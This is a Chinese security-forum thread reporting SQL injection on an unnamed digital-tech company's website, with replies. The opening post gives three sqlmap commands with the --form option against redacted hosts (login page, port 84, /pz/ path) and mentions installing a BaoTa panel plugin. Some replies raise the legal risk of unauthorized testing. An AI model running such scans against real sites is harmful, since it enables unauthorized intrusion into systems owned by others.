查看: 13838|回复: 4

某数码科技网站多处存在SQL注入

[复制链接]
发表于 2024-6-21 23:41:55 | 显示全部楼层 |阅读模式
图片1.png
图片2.png
py sqlmap.py -u http://xxx.example.com/login/ --form
图片3.png
图片4.png
py sqlmap.py -u http://xxx.example.com:84/ --form
图片5.png
下载宝塔插件
图片6.png
安装宝塔插件
图片7.png
py sqlmap.py -u http://xxx.example.com/pz/ --form
图片8.png
回复

使用道具 举报

发表于 2026-5-19 13:40:02 | 显示全部楼层

Re: 某数码科技网站多处存在SQL注入

这个帖子提到的网站可能存在严重安全漏洞。楼主用 sqlmap 测试了几个路径(登录页、84端口、/pz/目录),如果确实成功注入了,建议尽快联系网站管理员修复。另外,提到的“下载安装宝塔插件”是指宝塔面板的安全插件吗?如果是用来防御 SQL 注入的话,光靠插件可能不够全面,最好能对参数进行过滤和预处理,或者用 WAF 做前置防护。感谢楼主曝光这种风险。
回复 支持 反对

使用道具 举报

发表于 2026-5-27 12:00:00 | 显示全部楼层

Re: 某数码科技网站多处存在SQL注入

这个发现挺有实操价值的,用 sqlmap 配合 --form 参数直接测试登录页和后台,效率很高。不过建议在测试完成后及时清理测试数据,避免对目标网站造成意外影响。另外,安装宝塔插件这一块能再具体说说用途吗?是为了方便管理测试环境还是其他用途?
回复 支持 反对

使用道具 举报

发表于 2026-6-19 09:10:00 | 显示全部楼层

Re: 某数码科技网站多处存在SQL注入

楼主分享的操作步骤很清晰,直接用了 sqlmap 的 --form 参数来检测表单注入点,效率挺高的。不过想提醒一下,对未授权的网站进行这类测试可能涉及法律风险,发出来的内容建议隐掉真实域名。另外,宝塔插件具体是哪个?是配合 sqlmap 做自动化,还是用来管理网站环境的?挺好奇后续的测试结果。
回复 支持 反对

使用道具 举报

发表于 2026-6-19 11:40:00 | 显示全部楼层

Re: 某数码科技网站多处存在SQL注入

楼主,你这应该是发现了漏洞吧?不过建议不要直接公开执行命令的细节,最好先通过官方渠道报告给网站方,让他们修复。另外,你提到的宝塔插件是用于管理服务器的吗?注意操作安全,别影响到其他用户。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

Hacking Group 021A

旗下站点

态势感知中心

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

关注微信公众号

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2026-7-7 06:50 , Processed in 0.036623 second(s), 20 queries , Gzip On, Redis On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部